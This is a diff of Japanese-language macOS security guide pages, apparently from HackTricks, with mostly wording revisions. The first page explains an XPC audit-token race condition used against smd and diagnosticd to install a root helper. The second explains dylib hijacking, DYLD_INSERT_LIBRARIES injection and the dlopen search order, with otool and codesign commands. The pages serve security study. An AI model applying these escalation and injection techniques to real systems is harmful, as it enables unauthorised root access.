+- サービス **A** は、**`dispatch_async`** の **接続のイベントハンドラ内では _**ない_** 状態で `xpc_connection_get_audit_token` を呼び出します**。
+- したがって、**異なる** メッセージが **監査トークンを上書きする** 可能性があります。なぜなら、それはイベントハンドラの外で非同期にディスパッチされているからです。
 - 攻撃は **サービス B にサービス A への送信権を渡します**。
-- したがって、svc **B** は実際にサービス **A** に **メッセージを送信**します。
-- **攻撃**は **特権アクションを呼び出そうとします**。RC で svc **A** はこの **アクションの** 認証を **チェック** し、**svc B が監査トークンを上書きしました**(攻撃に特権アクションを呼び出すアクセスを与えます)。
+- したがって、svc **B** は実際にサービス **A** に **メッセージを送信** します。
+- **攻撃** は **特権アクションを呼び出そうとします**。RC で svc **A** はこの **アクションの** 認証を **チェック** し、**svc B が監査トークンを上書きしました**(攻撃に特権アクションを呼び出すアクセスを与えます)。
 2. バリアント 2:
 - サービス **B** は、ユーザーができないサービス A の **特権機能** を呼び出すことができます。
-- 攻撃は **サービス A** に接続し、サービス A は攻撃に **応答を期待するメッセージ** を送信します。特定の **応答** **ポート** で。
+- 攻撃は **サービス A** に接続し、サービスは攻撃に **特定の応答を期待するメッセージを送信** します。
 - 攻撃は **サービス** B に **その応答ポート** を渡すメッセージを送信します。
-- サービス **B** が応答すると、サービス A にメッセージを **送信し**、**攻撃** は異なる **メッセージをサービス A に送信し**、特権機能に **到達しようとし**、サービス B からの応答が監査トークンを完璧なタイミングで上書きすることを期待します(競合条件)。
+- サービス **B** が応答すると、**サービス A にメッセージを送信し**、**攻撃** はサービス A に異なる **メッセージを送信して特権機能に到達しようとし**、サービス B からの応答が監査トークンを完璧なタイミングで上書きすることを期待します(レースコンディション)。
 
 ## バリアント 1: イベントハンドラの外で xpc_connection_get_audit_token を呼び出す 
 
 シナリオ:
 
 - 接続できる 2 つの mach サービス **`A`** と **`B`**(サンドボックスプロファイルと接続を受け入れる前の認証チェックに基づく)。
-- _**A**_ は、**`B`** が渡すことができる特定のアクションの **認証チェック** を持っている必要があります(しかし、私たちのアプリはできません)。
+- _**A**_ は、**`B`** が通過できる特定のアクションの **認証チェック** を持っている必要があります(しかし、私たちのアプリはできません)。
 - たとえば、B がいくつかの **権限** を持っているか、**root** として実行されている場合、A に特権アクションを実行するように要求できるかもしれません。
 - この認証チェックのために、**`A`** は非同期的に監査トークンを取得します。たとえば、**`dispatch_async`** から `xpc_connection_get_audit_token` を呼び出すことによって。
 
 > [!CAUTION]
-> この場合、攻撃者は **競合条件** を引き起こし、**A にアクションを実行するように要求する**攻撃を何度もトリガーしながら、**B が `A` にメッセージを送信させる**ことができます。RC が **成功すると**、**B** の **監査トークン** がメモリにコピーされ、**私たちの攻撃** のリクエストが A によって **処理されている間**、特権アクションに **アクセス** できるようになります。
+> この場合、攻撃者は **レースコンディション** を引き起こし、**A にアクションを実行するように要求する** 攻撃を何度もトリガーしながら **B が `A` にメッセージを送信** させることができます。RC が **成功すると**、**B** の **監査トークン** がメモリにコピーされ、**私たちの攻撃のリクエストが A によって処理されている間に** アクセスを与え、**B のみが要求できる特権アクションにアクセスできるようになります**。
 
-これは **`A`** が `smd` として、**`B`** が `diagnosticd` として発生しました。関数 [`SMJobBless`](https://developer.apple.com/documentation/servicemanagement/1431078-smjobbless?language=objc) は、新しい特権ヘルパーツールをインストールするために使用できます(**root** として)。**root として実行されているプロセスが** **smd** に接触すると、他のチェックは実行されません。
+これは **`A`** が `smd` で、**`B`** が `diagnosticd` の場合に発生しました。関数 [`SMJobBless`](https://developer.apple.com/documentation/servicemanagement/1431078-smjobbless?language=objc) は、特権ヘルパーツールを新たにインストールするために使用できます(**root** として)。**root として実行されているプロセスが** **smd** に接触すると、他のチェックは実行されません。
 
-したがって、サービス **B** は **`diagnosticd`** であり、**root** として実行され、プロセスを **監視** するために使用できます。監視が開始されると、**毎秒複数のメッセージを送信します**。
+したがって、サービス **B** は **`diagnosticd`** であり、**root** として実行され、プロセスを **監視** するために使用されるため、監視が開始されると、**1 秒あたり複数のメッセージを送信します**。
 
 攻撃を実行するには:
 
@@ -76,14 +76,14 @@ XPC 接続がどのように確立されるか知らない場合は、確認し
 
 ![攻撃プロセスを示す画像](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/exploit.png)
 
-4. 次のステップは、`diagnosticd` に選択したプロセス(ユーザー自身のプロセスの可能性があります)の監視を開始するように指示することです。同時に、`smd` に対して通常の 1004 メッセージの洪水が送信されます。ここでの意図は、特権のあるツールをインストールすることです。
-5. このアクションは、`handle_bless` 関数内で競合条件を引き起こします。タイミングが重要です:`xpc_connection_get_pid` 関数呼び出しは、ユーザーのプロセスの PID を返さなければなりません(特権ツールはユーザーのアプリバンドルに存在します)。ただし、`xpc_connection_get_audit_token` 関数は、特に `connection_is_authorized` サブルーチン内で、`diagnosticd` に属する監査トークンを参照する必要があります。
+4. 次のステップは、`diagnosticd` に選択したプロセス(ユーザー自身のプロセスの可能性があります)の監視を開始するように指示することです。同時に、`smd` に対してルーチンの 1004 メッセージの洪水が送信されます。ここでの意図は、特権のあるツールをインストールすることです。
+5. このアクションは `handle_bless` 関数内でレースコンディションを引き起こします。タイミングが重要です:`xpc_connection_get_pid` 関数呼び出しは、ユーザーのプロセスの PID を返さなければなりません(特権ツールはユーザーのアプリバンドルに存在します)。ただし、`xpc_connection_get_audit_token` 関数は、特に `connection_is_authorized` サブルーチン内で、`diagnosticd` に属する監査トークンを参照する必要があります。
 
 ## バリアント 2: 応答の転送
 
 XPC(プロセス間通信)環境では、イベントハンドラは同時に実行されませんが、応答メッセージの処理には独自の動作があります。具体的には、応答を期待するメッセージを送信するための 2 つの異なる方法があります:
 
-1. **`xpc_connection_send_message_with_reply`**: ここでは、XPC メッセージが受信され、指定されたキューで処理されます。
+1. **`xpc_connection_send_message_with_reply`**: ここでは、XPC メッセージが指定されたキューで受信され、処理されます。
 2. **`xpc_connection_send_message_with_reply_sync`**: 逆に、この方法では、XPC メッセージが現在のディスパッチキューで受信され、処理されます。
 
 この区別は重要です。なぜなら、**応答パケットが XPC イベントハンドラの実行と同時に解析される可能性があるからです**。特に、`_xpc_connection_set_creds` は監査トークンの部分的な上書きを防ぐためにロックを実装していますが、接続オブジェクト全体に対してこの保護を拡張していません。したがって、パケットの解析とそのイベントハンドラの実行の間の間隔で監査トークンが置き換えられる脆弱性が生じます。
@@ -99,7 +99,7 @@ XPC(プロセス間通信)環境では、イベントハンドラは同時
 
 1. サービス **`A`** が応答を期待するメッセージを送信するのを待ちます。
 2. **`A`** に直接応答するのではなく、応答ポートをハイジャックしてサービス **`B`** にメッセージを送信します。
-3. 次に、禁止されたアクションに関するメッセージをディスパッチし、**`B`** からの応答と同時に処理されることを期待します。
+3. 次に、禁止されたアクションに関するメッセージが送信され、**`B`** からの応答と同時に処理されることが期待されます。
 
 以下は、説明された攻撃シナリオの視覚的表現です:
 
@@ -111,15 +111,15 @@ XPC(プロセス間通信)環境では、イベントハンドラは同時
 
 - **インスタンスの特定の困難**: `xpc_connection_get_audit_token` の使用例を静的および動的に検索するのは困難でした。
 - **方法論**: Frida を使用して `xpc_connection_get_audit_token` 関数をフックし、イベントハンドラから発信されない呼び出しをフィルタリングしました。ただし、この方法はフックされたプロセスに限定され、アクティブな使用が必要でした。
-- **分析ツール**: IDA/Ghidra などのツールを使用して到達可能な mach サービスを調査しましたが、プロセスは時間がかかり、dyld 共有キャッシュに関与する呼び出しによって複雑化しました。
-- **スクリプトの制限**: `dispatch_async` ブロックからの `xpc_connection_get_audit_token` への呼び出しの分析をスクリプト化しようとしましたが、ブロックの解析と dyld 共有キャッシュとの相互作用の複雑さによって妨げられました。
+- **分析ツール**: IDA/Ghidra のようなツールを使用して到達可能な mach サービスを調査しましたが、プロセスは時間がかかり、dyld 共有キャッシュに関わる呼び出しによって複雑化しました。
+- **スクリプトの制限**: `dispatch_async` ブロックからの `xpc_connection_get_audit_token` への呼び出しの分析をスクリプト化しようとした試みは、ブロックの解析と dyld 共有キャッシュとの相互作用の複雑さによって妨げられました。
 
 ## 修正 
 
-- **報告された問題**: `smd` 内で見つかった一般的および特定の問題を詳細に記載した報告書が Apple に提出されました。
+- **報告された問題**: `smd` 内で見つかった一般的および特定の問題を詳細に記載した報告が Apple に提出されました。
 - **Apple の対応**: Apple は `smd` 内の問題に対処し、`xpc_connection_get_audit_token` を `xpc_dictionary_get_audit_token` に置き換えました。
 - **修正の性質**: `xpc_dictionary_get_audit_token` 関数は、受信した XPC メッセージに関連付けられた mach メッセージから直接監査トークンを取得するため、安全と見なされています。ただし、`xpc_connection_get_audit_token` と同様に、公開 API の一部ではありません。
-- **より広範な修正の不在**: Apple が接続の保存された監査トークンと一致しないメッセージを破棄するなど、より包括的な修正を実装しなかった理由は不明です。特定のシナリオ(例:`setuid` の使用)での正当な監査トークンの変更の可能性が要因かもしれません。
-- **現在の状況**: この問題は iOS 17 と macOS 14 に残っており、それを特定し理解しようとする人々にとって課題となっています。
+- **より広範な修正の欠如**: Apple が接続の保存された監査トークンと一致しないメッセージを破棄するなど、より包括的な修正を実装しなかった理由は不明です。特定のシナリオ(例:`setuid` の使用)での正当な監査トークンの変更の可能性が要因かもしれません。
+- **現在の状況**: この問題は iOS 17 および macOS 14 にも残っており、これを特定し理解しようとする人々にとって課題となっています。
 
 {{#include ../../../../../../banners/hacktricks-training.md}}
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
index 918b51f8d..b69671ebb 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md
@@ -7,7 +7,8 @@
 
 ## **Dyldプロセス**
 
-Dyldがバイナリ内でライブラリをどのようにロードするかを確認してください:
+Dyldがバイナリ内でライブラリをどのようにロードするかを見てみましょう:
+
 
 {{#ref}}
 macos-dyld-process.md
@@ -17,27 +18,27 @@ macos-dyld-process.md
 
 これは[**LinuxのLD_PRELOAD**](../../../../linux-hardening/privilege-escalation/index.html#ld_preload)のようなものです。特定のライブラリをパスからロードするために実行されるプロセスを指定することができます(環境変数が有効な場合)。
 
-この技術は、すべてのインストールされたアプリケーションに「Info.plist」と呼ばれるplistがあり、`LSEnvironmental`というキーを使用して**環境変数を割り当てることができるため**、**ASEP技術としても使用される可能性があります**。
+この技術は、すべてのインストールされたアプリケーションに「Info.plist」と呼ばれるplistがあり、`LSEnvironmental`というキーを使用して**環境変数を割り当てる**ことができるため、**ASEP技術としても使用される可能性があります**。
 
-> [!NOTE]
+> [!TIP]
 > 2012年以降、**Appleは`DYLD_INSERT_LIBRARIES`の権限を大幅に制限しました**。
 >
 > コードを確認し、**`src/dyld.cpp`**をチェックしてください。関数**`pruneEnvironmentVariables`**では、**`DYLD_*`**変数が削除されることがわかります。
 >
-> 関数**`processRestricted`**では、制限の理由が設定されています。そのコードを確認すると、理由は次のとおりです:
+> 関数**`processRestricted`**では、制限の理由が設定されます。そのコードを確認すると、理由は次のとおりです:
 >
 > - バイナリが`setuid/setgid`である
 > - machoバイナリに`__RESTRICT/__restrict`セクションが存在する
 > - ソフトウェアが[`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_security_cs_allow-dyld-environment-variables)権限なしに権限を持っている(ハードンされたランタイム)
->   - バイナリの**権限**を確認するには:`codesign -dv --entitlements :- `
+>  - バイナリの**権限**を確認するには:`codesign -dv --entitlements :- `
 >
-> より新しいバージョンでは、このロジックは関数**`configureProcessRestrictions`**の後半に見つけることができます。ただし、新しいバージョンで実行されるのは関数の**最初のチェック**です(iOSやシミュレーションに関連するifを削除できます。これらはmacOSでは使用されません)。
+> より新しいバージョンでは、このロジックは関数**`configureProcessRestrictions`**の後半部分にあります。ただし、新しいバージョンで実行されるのは、関数の**最初のチェック**です(iOSやシミュレーションに関連するifを削除できます。これらはmacOSでは使用されません)。
 
 ### ライブラリの検証
 
 バイナリが**`DYLD_INSERT_LIBRARIES`**環境変数の使用を許可していても、バイナリがライブラリの署名をチェックする場合、カスタムライブラリはロードされません。
 
-カスタムライブラリをロードするには、バイナリが次のいずれかの権限を持っている必要があります:
+カスタムライブラリをロードするには、バイナリが次の**いずれかの権限**を持っている必要があります:
 
 - [`com.apple.security.cs.disable-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.security.cs.disable-library-validation)
 - [`com.apple.private.security.clear-library-validation`](../../macos-security-protections/macos-dangerous-entitlements.md#com.apple.private.security.clear-library-validation)
@@ -48,7 +49,7 @@ macos-dyld-process.md
 
 バイナリと同じ証明書で**署名されたライブラリ**をロードすることもできます。
 
-この方法を(悪用)する方法と制限を確認するには:
+この方法を(悪用)する例を見つけ、制限を確認するには:
 
 {{#ref}}
 macos-dyld-hijacking-and-dyld_insert_libraries.md
@@ -59,25 +60,25 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
 > [!CAUTION]
 > **以前のライブラリ検証制限もDylibハイジャック攻撃を実行するために適用されることを忘れないでください**。
 
-Windowsと同様に、MacOSでも**dylibsをハイジャック**して**アプリケーション**が**任意の**コードを**実行**することができます(実際には、通常のユーザーからは、`.app`バンドル内に書き込むためにTCC権限が必要なため、これは不可能かもしれません)。\
-ただし、**MacOS**アプリケーションがライブラリを**ロード**する方法は**Windowsよりも制限されています**。これは、**マルウェア**開発者がこの技術を**ステルス**に使用できることを意味しますが、**権限を昇格させるために悪用できる可能性ははるかに低い**です。
+Windowsと同様に、MacOSでも**dylibsをハイジャック**して**アプリケーション**が**任意の**コードを**実行**することができます(実際には、通常のユーザーからは不可能かもしれません。`.app`バンドル内に書き込むためにTCCの権限が必要になる可能性があります)。\
+ただし、**MacOS**アプリケーションがライブラリを**ロード**する方法は**Windowsよりも制限されています**。これは、**マルウェア**開発者がこの技術を**隠密性**のために使用できる可能性があることを意味しますが、**権限を昇格させるために悪用できる可能性ははるかに低い**です。
 
-まず第一に、**MacOSバイナリがライブラリをロードするための完全なパスを示すことが**より一般的です。第二に、**MacOSはライブラリのために**$PATHのフォルダを**検索することはありません**。
+まず第一に、**MacOSバイナリがライブラリをロードするためにフルパスを示すことが**より一般的です。第二に、**MacOSはライブラリのために**$PATHのフォルダを**検索しません**。
 
 この機能に関連する**コードの主な部分**は、`ImageLoader.cpp`の**`ImageLoader::recursiveLoadLibraries`**にあります。
 
 machoバイナリがライブラリをロードするために使用できる**4つの異なるヘッダーコマンド**があります:
 
 - **`LC_LOAD_DYLIB`**コマンドはdylibをロードするための一般的なコマンドです。
-- **`LC_LOAD_WEAK_DYLIB`**コマンドは前のコマンドと同様に機能しますが、dylibが見つからない場合、実行はエラーなしで続行されます。
+- **`LC_LOAD_WEAK_DYLIB`**コマンドは前のものと同様に機能しますが、dylibが見つからない場合、実行はエラーなしで続行されます。
 - **`LC_REEXPORT_DYLIB`**コマンドは、異なるライブラリからシンボルをプロキシ(または再エクスポート)します。
 - **`LC_LOAD_UPWARD_DYLIB`**コマンドは、2つのライブラリが互いに依存している場合に使用されます(これは_上向き依存関係_と呼ばれます)。
 
 ただし、**dylibハイジャックには2種類あります**:
 
-- **欠落している弱リンクライブラリ**:これは、アプリケーションが**LC_LOAD_WEAK_DYLIB**で構成された存在しないライブラリをロードしようとすることを意味します。次に、**攻撃者が期待される場所にdylibを配置すると、それがロードされます**。
+- **欠落している弱リンクライブラリ**:これは、アプリケーションが**LC_LOAD_WEAK_DYLIB**で構成された存在しないライブラリをロードしようとすることを意味します。次に、**攻撃者がdylibを期待される場所に配置すると、それがロードされます**。
 - リンクが「弱い」ということは、ライブラリが見つからなくてもアプリケーションは実行を続けることを意味します。
-- これに関連する**コード**は、`ImageLoaderMachO::doGetDependentLibraries`の`ImageLoaderMachO.cpp`の関数にあり、`lib->required`は`LC_LOAD_WEAK_DYLIB`がtrueのときのみ`false`です。
+- これに関連する**コード**は、`ImageLoaderMachO::doGetDependentLibraries`の関数内にあり、`lib->required`は**`LC_LOAD_WEAK_DYLIB`**がtrueのときのみ`false`です。
 - バイナリ内の**弱リンクライブラリを見つける**には(後でハイジャックライブラリを作成する方法の例があります):
 - ```bash
 otool -l  | grep LC_LOAD_WEAK_DYLIB -A 5 cmd LC_LOAD_WEAK_DYLIB
@@ -89,25 +90,26 @@ compatibility version 1.0.0
 ```
 - **@rpathで構成された**:Mach-Oバイナリは**`LC_RPATH`**および**`LC_LOAD_DYLIB`**コマンドを持つことができます。これらのコマンドの**値**に基づいて、**ライブラリ**は**異なるディレクトリ**から**ロード**されます。
 - **`LC_RPATH`**は、バイナリによってライブラリをロードするために使用されるいくつかのフォルダのパスを含みます。
-- **`LC_LOAD_DYLIB`**は、ロードする特定のライブラリへのパスを含みます。これらのパスには**`@rpath`**が含まれる場合があり、これは**`LC_RPATH`**の値によって**置き換えられます**。**`LC_RPATH`**に複数のパスがある場合、すべてがライブラリをロードするために使用されます。例:
-- **`LC_LOAD_DYLIB`**が`@rpath/library.dylib`を含み、**`LC_RPATH`**が`/application/app.app/Contents/Framework/v1/`および`/application/app.app/Contents/Framework/v2/`を含む場合。両方のフォルダが`library.dylib`をロードするために使用されます。**ライブラリが`[...] /v1/`に存在しない場合、攻撃者はそこに配置して`[...] /v2/`のライブラリのロードをハイジャックできます。** **`LC_LOAD_DYLIB`**のパスの順序が守られます。
+- **`LC_LOAD_DYLIB`**は、ロードする特定のライブラリへのパスを含みます。これらのパスには**`@rpath`**が含まれる場合があり、**`LC_RPATH`**の値で**置き換えられます**。**`LC_RPATH`**に複数のパスがある場合、すべてがライブラリをロードするために使用されます。例:
+- **`LC_LOAD_DYLIB`**に`@rpath/library.dylib`が含まれ、**`LC_RPATH`**に`/application/app.app/Contents/Framework/v1/`および`/application/app.app/Contents/Framework/v2/`が含まれている場合。両方のフォルダが`library.dylib`をロードするために使用されます。**`[...] /v1/`にライブラリが存在しない場合、攻撃者はそこに配置して`[...] /v2/`のライブラリのロードをハイジャックできます。** **`LC_LOAD_DYLIB`**のパスの順序が守られます。
 - バイナリ内の**rpathパスとライブラリを見つける**には:`otool -l  | grep -E "LC_RPATH|LC_LOAD_DYLIB" -A 5`
 
-> [!NOTE] > **`@executable_path`**:は**メイン実行可能ファイル**を含むディレクトリへの**パス**です。
+> [!NOTE] > **`@executable_path`**:は**メイン実行ファイル**を含むディレクトリへの**パス**です。
 >
-> **`@loader_path`**:は**ロードコマンドを含むMach-Oバイナリ**を含む**ディレクトリ**への**パス**です。
+> **`@loader_path`**:は**ロードコマンド**を含む**Mach-Oバイナリ**を含む**ディレクトリ**への**パス**です。
 >
-> - 実行可能ファイルで使用されるとき、**`@loader_path`**は実質的に**`@executable_path`**と同じです。
-> - **dylib**で使用されるとき、**`@loader_path`**は**dylib**への**パス**を提供します。
+> - 実行可能ファイルで使用される場合、**`@loader_path`**は実質的に**`@executable_path`**と同じです。
+> - **dylib**で使用される場合、**`@loader_path`**は**dylib**への**パス**を提供します。
 
-この機能を悪用して**権限を昇格させる**方法は、**root**によって実行されている**アプリケーション**が、攻撃者が書き込み権限を持つフォルダ内の**ライブラリを探している**という稀なケースにあります。
+この機能を悪用して**権限を昇格させる**方法は、**root**によって実行されている**アプリケーション**が、攻撃者が書き込み権限を持つフォルダ内の**ライブラリを探している**という稀なケースです。
 
 > [!TIP]
-> アプリケーション内の**欠落しているライブラリ**を見つけるための優れた**スキャナー**は、[**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html)または[**CLIバージョン**](https://github.com/pandazheng/DylibHijack)です。\
+> アプリケーション内の**欠落しているライブラリ**を見つけるための優れた**スキャナー**は[**Dylib Hijack Scanner**](https://objective-see.com/products/dhs.html)または[**CLIバージョン**](https://github.com/pandazheng/DylibHijack)です。\
 > この技術に関する**技術的詳細を含む優れたレポート**は[**こちら**](https://www.virusbulletin.com/virusbulletin/2015/03/dylib-hijacking-os-x)で見つけることができます。
 
 **例**
 
+
 {{#ref}}
 macos-dyld-hijacking-and-dyld_insert_libraries.md
 {{#endref}}
@@ -119,7 +121,7 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
 
 **`man dlopen`**から:
 
-- パスに**スラッシュ文字が含まれていない場合**(つまり、単なるリーフ名の場合)、**dlopen()は検索を行います**。**`$DYLD_LIBRARY_PATH`**が起動時に設定されている場合、dyldは最初にそのディレクトリを**探します**。次に、呼び出し元のmach-oファイルまたはメイン実行可能ファイルが**`LC_RPATH`**を指定している場合、dyldは**それらの**ディレクトリを**探します**。次に、プロセスが**制限されていない**場合、dyldは**現在の作業ディレクトリ**を検索します。最後に、古いバイナリの場合、dyldはいくつかのフォールバックを試みます。**`$DYLD_FALLBACK_LIBRARY_PATH`**が起動時に設定されている場合、dyldは**それらのディレクトリ**を検索します。そうでない場合、dyldは**`/usr/local/lib/`**(プロセスが制限されていない場合)を検索し、次に**`/usr/lib/`**を検索します(この情報は**`man dlopen`**から取得されました)。
+- パスに**スラッシュ文字が含まれていない**場合(つまり、単なるリーフ名の場合)、**dlopen()は検索を行います**。**`$DYLD_LIBRARY_PATH`**が起動時に設定されている場合、dyldは最初にそのディレクトリを**探します**。次に、呼び出し元のmach-oファイルまたはメイン実行可能ファイルが**`LC_RPATH`**を指定している場合、dyldは**それらの**ディレクトリを**探します**。次に、プロセスが**制限されていない**場合、dyldは**現在の作業ディレクトリ**を検索します。最後に、古いバイナリの場合、dyldはいくつかのフォールバックを試みます。**`$DYLD_FALLBACK_LIBRARY_PATH`**が起動時に設定されている場合、dyldは**それらのディレクトリ**を検索します。そうでない場合、dyldは**`/usr/local/lib/`**(プロセスが制限されていない場合)を検索し、その後**`/usr/lib/`**を検索します(この情報は**`man dlopen`**から取得されました)。
 1. `$DYLD_LIBRARY_PATH`
 2. `LC_RPATH`
 3. `CWD`(制限されていない場合)
@@ -133,9 +135,9 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
 > - いずれかの**`LC_RPATH`**が**書き込み可能**である場合(ただし署名がチェックされるため、これにはバイナリが制限されていない必要があります)
 > - バイナリが**制限されていない**場合、CWDから何かをロードすることが可能です(または前述の環境変数のいずれかを悪用することができます)
 
-- パスが**フレームワークのように見える**場合(例:`/stuff/foo.framework/foo`)、**`$DYLD_FRAMEWORK_PATH`**が起動時に設定されている場合、dyldは最初にそのディレクトリで**フレームワーク部分パス**(例:`foo.framework/foo`)を探します。次に、dyldは**指定されたパスをそのまま**試みます(相対パスの場合は現在の作業ディレクトリを使用)。最後に、古いバイナリの場合、dyldはいくつかのフォールバックを試みます。**`$DYLD_FALLBACK_FRAMEWORK_PATH`**が起動時に設定されている場合、dyldはそれらのディレクトリを検索します。そうでない場合、dyldは**`/Library/Frameworks`**(macOSでプロセスが制限されていない場合)、次に**`/System/Library/Frameworks`**を検索します。
+- パスが**フレームワークのように見える**場合(例:`/stuff/foo.framework/foo`)、**`$DYLD_FRAMEWORK_PATH`**が起動時に設定されている場合、dyldは最初にそのディレクトリで**フレームワーク部分パス**(例:`foo.framework/foo`)を探します。次に、dyldは**提供されたパスをそのまま**試みます(相対パスの場合は現在の作業ディレクトリを使用)。最後に、古いバイナリの場合、dyldはいくつかのフォールバックを試みます。**`$DYLD_FALLBACK_FRAMEWORK_PATH`**が起動時に設定されている場合、dyldはそれらのディレクトリを検索します。そうでない場合、**`/Library/Frameworks`**(macOSでプロセスが制限されていない場合)、次に**`/System/Library/Frameworks`**を検索します。
 1. `$DYLD_FRAMEWORK_PATH`
-2. 指定されたパス(制限されていない場合は相対パスに現在の作業ディレクトリを使用)
+2. 提供されたパス(制限されていない場合は相対パスに現在の作業ディレクトリを使用)
 3. `$DYLD_FALLBACK_FRAMEWORK_PATH`
 4. `/Library/Frameworks`(制限されていない場合)
 5. `/System/Library/Frameworks`
@@ -143,11 +145,11 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
 > [!CAUTION]
 > フレームワークパスの場合、ハイジャックする方法は次のとおりです:
 >
-> - プロセスが**制限されていない**場合、CWDからの**相対パス**を悪用することができます。前述の環境変数(プロセスが制限されている場合、DYLD_*環境変数は削除されます)を使用します。
+> - プロセスが**制限されていない**場合、CWDからの**相対パス**を悪用することができます。前述の環境変数(プロセスが制限されている場合、DYLD_*環境変数は削除されるため、ドキュメントには記載されていません)。
 
-- パスが**スラッシュを含むがフレームワークパスでない場合**(つまり、dylibへの完全なパスまたは部分的なパス)、dlopen()は最初に(設定されている場合)**`$DYLD_LIBRARY_PATH`**(パスのリーフ部分を使用)を検索します。次に、dyldは**指定されたパスを試みます**(相対パスの場合は現在の作業ディレクトリを使用しますが、制限されていないプロセスの場合のみ)。最後に、古いバイナリの場合、dyldはいくつかのフォールバックを試みます。**`$DYLD_FALLBACK_LIBRARY_PATH`**が起動時に設定されている場合、dyldはそれらのディレクトリを検索します。そうでない場合、dyldは**`/usr/local/lib/`**(プロセスが制限されていない場合)を検索し、次に**`/usr/lib/`**を検索します。
+- パスに**スラッシュが含まれているがフレームワークパスではない**場合(つまり、dylibへのフルパスまたは部分パス)、dlopen()は最初に(設定されている場合)**`$DYLD_LIBRARY_PATH`**で(パスのリーフ部分を使用して)探します。次に、dyldは**提供されたパスを試みます**(相対パスの場合は現在の作業ディレクトリを使用しますが、制限されていないプロセスの場合のみ)。最後に、古いバイナリの場合、dyldはフォールバックを試みます。**`$DYLD_FALLBACK_LIBRARY_PATH`**が起動時に設定されている場合、dyldはそれらのディレクトリを検索します。そうでない場合、dyldは**`/usr/local/lib/`**(プロセスが制限されていない場合)を検索し、その後**`/usr/lib/`**を検索します。
 1. `$DYLD_LIBRARY_PATH`
-2. 指定されたパス(制限されていない場合は相対パスに現在の作業ディレクトリを使用)
+2. 提供されたパス(制限されていない場合は相対パスに現在の作業ディレクトリを使用)
 3. `$DYLD_FALLBACK_LIBRARY_PATH`
 4. `/usr/local/lib/`(制限されていない場合)
 5. `/usr/lib/`
@@ -157,10 +159,10 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
 >
 > - バイナリが**制限されていない**場合、CWDまたは`/usr/local/lib`から何かをロードすることが可能です(または前述の環境変数のいずれかを悪用することができます)。
 
-> [!NOTE]
-> 注意:**dlopen検索を制御するための**構成ファイルは**ありません**。
+> [!TIP]
+> 注意:**dlopen検索を制御する**ための設定ファイルは**ありません**。
 >
-> 注意:メイン実行可能ファイルが**set\[ug]idバイナリまたは権限でコードサインされている場合**、**すべての環境変数は無視され**、フルパスのみが使用できます(詳細な情報については[DYLD_INSERT_LIBRARIES制限を確認してください](macos-dyld-hijacking-and-dyld_insert_libraries.md#check-dyld_insert_librery-restrictions))。
+> 注意:メイン実行可能ファイルが**set\[ug]idバイナリまたは権限でコードサインされている**場合、**すべての環境変数は無視され**、フルパスのみが使用できます(詳細情報については[DYLD_INSERT_LIBRARIES制限を確認してください](macos-dyld-hijacking-and-dyld_insert_libraries.md#check-dyld_insert_librery-restrictions))。
 >
 > 注意:Appleプラットフォームは、32ビットと64ビットのライブラリを組み合わせるために「ユニバーサル」ファイルを使用します。これは、**32ビットと64ビットの検索パスが別々に存在しない**ことを意味します。
 >
@@ -168,7 +170,7 @@ macos-dyld-hijacking-and-dyld_insert_libraries.md
 
 **パスを確認する**
 
-次のコードを使用してすべてのオプションを確認しましょう:
+次のコードを使用して、すべてのオプションを確認しましょう:
 ```c
 // gcc dlopentest.c -o dlopentest -Wl,-rpath,/tmp/test
 #include 
@@ -217,13 +219,13 @@ sudo fs_usage | grep "dlopentest"
 ```
 ## 相対パスハイジャック
 
-特権バイナリ/アプリ(SUIDや強力な権限を持つバイナリなど)が相対パスライブラリ(例えば、`@executable_path`や`@loader_path`を使用)を読み込んでおり、ライブラリ検証が無効になっている場合、攻撃者が相対パスで読み込まれるライブラリを変更できる場所にバイナリを移動し、プロセスにコードを注入するためにそれを悪用することが可能です。
+特権のあるバイナリ/アプリ(SUIDや強力な権限を持つバイナリなど)が相対パスライブラリ(例えば、`@executable_path`や`@loader_path`を使用)を読み込んでおり、ライブラリ検証が無効になっている場合、攻撃者がバイナリを移動させ、相対パスで読み込まれるライブラリを変更し、プロセスにコードを注入することが可能になるかもしれません。
 
 ## `DYLD_*`および`LD_LIBRARY_PATH`環境変数の削除
 
 ファイル`dyld-dyld-832.7.1/src/dyld2.cpp`には、**`pruneEnvironmentVariables`**という関数があり、**`DYLD_`**で始まる環境変数と**`LD_LIBRARY_PATH=`**を削除します。
 
-また、特に**suid**および**sgid**バイナリに対して、環境変数**`DYLD_FALLBACK_FRAMEWORK_PATH`**と**`DYLD_FALLBACK_LIBRARY_PATH`**を**null**に設定します。
+この関数は、特に**suid**および**sgid**バイナリのために、環境変数**`DYLD_FALLBACK_FRAMEWORK_PATH`**と**`DYLD_FALLBACK_LIBRARY_PATH`**を**null**に設定します。
 
 この関数は、OSXをターゲットにする場合、同じファイルの**`_main`**関数から呼び出されます。
 ```cpp
@@ -286,7 +288,7 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-restrict
 ```
 ### Hardened runtime
 
-Keychainで新しい証明書を作成し、それを使用してバイナリに署名します:
+Keychainに新しい証明書を作成し、それを使用してバイナリに署名します:
 ```bash
 # Apply runtime proetction
 codesign -s  --option=runtime ./hello
@@ -307,7 +309,7 @@ codesign -f -s  --option=restrict hello-signed
 DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work
 ```
 > [!CAUTION]
-> **`0x0(none)`** フラグで署名されたバイナリがあっても、実行時に **`CS_RESTRICT`** フラグが動的に設定される可能性があるため、この技術はそれらには適用できません。
